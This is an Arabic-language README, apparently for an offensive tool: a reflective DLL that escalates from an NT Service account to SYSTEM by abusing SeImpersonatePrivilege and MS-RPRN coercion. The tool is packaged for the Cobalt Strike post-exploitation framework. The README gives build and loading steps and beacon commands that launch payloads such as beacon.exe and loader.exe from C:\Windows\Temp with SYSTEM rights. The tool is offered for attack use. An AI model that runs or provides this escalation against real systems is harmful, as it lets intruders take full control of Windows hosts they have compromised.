
مكتبة DLL انعكاسية لرفع الصلاحيات من خدمة NT Service إلى SYSTEM باستخدام صلاحية SeImpersonateToken
استغلال صلاحيات من خدمة NT إلى SYSTEM باستخدام امتياز SeImpersonateToken ودوال MS-RPRN.
مبني بشكل كبير على https://github.com/Prepouce/CoercedPotato
Reflective Loader من https://github.com/stephenfewer/ReflectiveDLLInjection.
استنسخ هذا المستودع وقم بتجميع المشروع في VisualStudio ثم حمّل dist/coercedpotato.cna إلى CobaltStrike.
تحتاج أولاً إلى تشغيل مستمع RPC باستخدام:
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
على سبيل المثال:
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
ثم يمكنك تشغيل استدعاء SYSTEM:
beacon> CoercedPotato coerce